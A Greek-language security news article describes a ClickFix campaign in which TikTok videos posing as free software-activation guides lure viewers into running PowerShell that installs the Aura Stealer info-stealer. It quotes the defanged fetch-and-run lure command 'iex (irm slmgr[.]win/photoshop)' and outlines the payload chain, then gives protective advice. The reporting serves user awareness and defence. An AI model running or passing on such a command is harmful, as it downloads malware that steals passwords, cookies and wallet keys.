ΑρχικήSecurityClickFix: TikTok βίντεο διανέμουν info-stealer malware

ClickFix: TikTok βίντεο διανέμουν info-stealer malware

Κυβερνοεγκληματίες αξιοποιούν βίντεο στο TikTok που παρουσιάζονται ως «δωρεάν οδηγοί ενεργοποίησης» για δημοφιλές λογισμικό —όπως Windows, Spotify, Netflix και εφαρμογές Adobe— προκειμένου να διασπείρουν κακόβουλο λογισμικό κλοπής διαπιστευτηρίων (info-stealer malware). Η εκστρατεία, την οποία παρατήρησαν ερευνητές όπως ο Xavier Mertens και παλαιότερα η Trend Micro, χρησιμοποιεί σύντομες εντολές PowerShell μέσα σε βίντεο που παραπλανούν τους χρήστες να τρέξουν κώδικα με δικαιώματα διαχειριστή.

Πώς λειτουργεί η απάτη

Τα βίντεο υπόσχονται νόμιμη ενεργοποίηση προϊόντων —Windows, Microsoft 365, Photoshop, Premiere, CapCut Pro, Discord Nitro, καθώς και υπηρεσίες όπως Netflix και Spotify Premium— αλλά στην πραγματικότητα προτρέπουν τους θεατές να αντιγράψουν και να εκτελέσουν μία σύντομη εντολή (π.χ. iex (irm slmgr[.]win/photoshop)) στο PowerShell. Το URL προσαρμόζεται ώστε να περιέχει το όνομα του προβαλλόμενου προγράμματος, ενισχύοντας την ψευδαίσθηση νομιμότητας. Πρόκειται για τεχνική κοινωνικής μηχανικής τύπου ClickFix: μια «διόρθωση ή οδηγός» που στην ουσία ενεργοποιεί αλυσιδωτά σενάρια μόλυνσης.

Δείτε επίσης: Encrypt Everything: Ο εύκολος τρόπος να διαφυλάξεις τα δεδομένα σου το 2025

ClickFix: TikTok βίντεο διανέμουν info-stealer malware

Τεχνικό προφίλ του μολυσματικού φορτίου

Αφού εκτελεστεί η εντολή, το PowerShell συνδέεται σε απομακρυσμένο διακομιστή (π.χ. slmgr[.]win), κατεβάζει και εκτελεί ένα δεύτερο PowerShell script που με τη σειρά του φέρνει δύο εκτελέσιμα από Cloudflare pages. Το πρώτο, updater.exe, είναι παραλλαγή του Aura Stealer —κακόβουλου λογισμικού που συλλέγει αποθηκευμένα passwords, cookies, κλειδιά από crypto wallets και διαπιστευτήρια εφαρμογών— και τα αποστέλλει στους εισβολείς. Το δεύτερο payload, source.exe, εκτελείται απευθείας στη μνήμη, τεχνική που δυσχεραίνει την ανίχνευση από antivirus που βασίζονται σε αρχεία.

Τι κινδυνεύει

Οι πληροφορίες που στοχεύονται έχουν υψηλή αξία: διαπιστευτήρια περιήγησης, session cookies που επιτρέπουν πρόσβαση σε λογαριασμούς, και ιδιωτικά κλειδιά κρυπτονομισμάτων. Όποιος εκτέλεσε τις εντολές θα πρέπει να θεωρεί ότι τα credentials του έχουν εκτεθεί, να αλλάξει αμέσως όλους τους κωδικούς, να ενεργοποιήσει πολυπαραγοντική ταυτοποίηση (MFA) και να ελέγξει τις συσκευές με αξιόπιστα εργαλεία ασφάλειας. Επιπλέον, απαιτείται έλεγχος για μη εξουσιοδοτημένες συναλλαγές και άμεση επαναφορά κλειδιών σε πορτοφόλια ή υπηρεσίες όπου αυτό είναι δυνατό.

ClickFix TikTok info-stealer malware

Γιατί το ClickFix είναι αποτελεσματικό

Η τεχνική ClickFix βασίζεται στην ανθρώπινη συμπεριφορά: περιέργεια, επιθυμία για «δωρεάν» λύσεις και η πίστη σε μια σύντομη εντολή που φαίνεται τεχνική αλλά αβλαβής. Η διανομή μέσω δημοφιλών εφαρμογών βίντεο, όπως το TikTok, πολλαπλασιάζει την έκθεση και καθιστά πιο δύσκολο τον γρήγορο εντοπισμό από την κοινότητα ασφαλείας, ενώ οι επιτιθέμενοι προσαρμόζουν τα URLs ώστε να μιμούνται επίσημα domains και ονόματα προϊόντων.

Δείτε επίσης: Η Microsoft ανακαλεί 200 πιστοποιητικά που χρησιμοποιήθηκαν σε επιθέσεις ransomware

Μέτρα προστασίας για χρήστες και οργανισμούς

Μην αντιγράφετε και μην εκτελείτε εντολές από βίντεο ή αγνώστους σε PowerShell, Terminal κλπ. Ενημερωθείτε σχετικά με το ρίσκο των εντολών που ζητούν δικαιώματα διαχειριστή. Χρησιμοποιήστε password managers, ενεργοποιήστε MFA (ιδιαίτερα εφαρμογές ελέγχου ταυτότητας ή hardware tokens), κάντε τακτικά offline και off-site backups και εφαρμόστε endpoint protection. Οι οργανισμοί πρέπει να εφαρμόζουν διαδικασίες incident response, σαφείς οδηγίες για αναφορά ύποπτων περιστατικών, απομόνωση μολυσμένων συστημάτων, συλλογή logs και γρήγορη επικοινωνία με ομάδες ασφάλειας.

Τάση και πρόσφατες χρήσεις

Οι επιθέσεις ClickFix έχουν γίνει πηγή διανομής όχι μόνο info-stealer malware αλλά και payloads που χρησιμοποιούνται σε εκστρατείες ransomware και κλοπής κρυπτονομισμάτων. Η ευκολία δημιουργίας βίντεο και η viral φύση τους επιτρέπουν στον αντίπαλο να φτάσει γρήγορα σε μεγάλο αριθμό θυμάτων, ενώ οι παραλλαγές του Aura Stealer και οι τεχνικές εκτέλεσης σε μνήμη καθιστούν την ανάλυση και την αφαίρεση πιο δύσκολη για την κοινότητα ασφαλείας.

Δείτε επίσης: Βορειοκορεάτες χάκερ χρησιμοποιούν το EtherHiding και κρύβουν malware σε Blockchain Smart Contracts

ClickFix: TikTok βίντεο διανέμουν info-stealer malware

Ρόλος πλατφορμών και ερευνητών

Πλατφόρμες όπως το TikTok οφείλουν να βελτιώσουν την ανίχνευση περιεχομένου που προτρέπει σε εκτέλεση κώδικα και να επιταχύνουν την αφαίρεση τέτοιων βίντεο. Οι ερευνητές ασφάλειας πρέπει να μοιράζονται δείκτες παραβίασης (IOCs) και τεχνικές αναλύσεις ώστε πάροχοι antivirus και ομάδες αντίδρασης να μπλοκάρουν τα κανάλια διανομής και να προσαρμόσουν signatures.

Η υπόσχεση «εύκολης ενεργοποίησης» μέσω μίας γραμμής εντολής αποτελεί συχνά παγίδα. Ψηφιακή επαγρύπνηση, συνεχής εκπαίδευση και εφαρμογή βασικών κανόνων ασφάλειας είναι η πιο αποτελεσματική άμυνα. Αν υπάρχει υποψία ότι εκτελέσατε κακόβουλη εντολή, συμβουλευτείτε άμεσα ειδικό ασφαλείας και αλλάξτε κωδικούς χωρίς καθυστέρηση.

Πηγή: www.bleepingcomputer.com

Επιλογή της ομάδας

🔒 Προστατέψτε την ιδιωτικότητά σας με Proton VPN

Ελβετικό VPN από τους δημιουργούς του Proton Mail — αυστηρή πολιτική no-logs, ισχυρή κρυπτογράφηση και ενσωματωμένο NetShield που μπλοκάρει διαφημίσεις, trackers & malware.

  • ✔ No-logs, με έδρα την Ελβετία (εκτός 14-Eyes)
  • ✔ NetShield: φραγή διαφημίσεων, trackers & κακόβουλων domains
  • ✔ Καλύπτει όλες τις συσκευές — δωρεάν έκδοση διαθέσιμη
Δοκιμάστε δωρεάν το Proton VPN — 30 ημέρες εγγύηση επιστροφής →

Ο σύνδεσμος είναι συνεργατικός (affiliate) — το SecNews ενδέχεται να λάβει προμήθεια χωρίς επιπλέον κόστος για εσάς. Δεν επηρεάζει την ανεξαρτησία της αρθρογραφίας μας.

📧
Εγγραφείτε στο Newsletter του SecNews

Τα σημαντικότερα νέα Ασφάλειας & Τεχνολογίας στο Inbox σας.

Digital Fortress
Digital Fortresshttps://www.secnews.gr
Pursue Your Dreams & Live!

ΑΝΑΖΗΤΗΣΗ

FOLLOW US

📧
Newsletter SecNews
Τα σημαντικότερα νέα Ασφάλειας & Τεχνολογίας στο inbox σας.

LIVE NEWS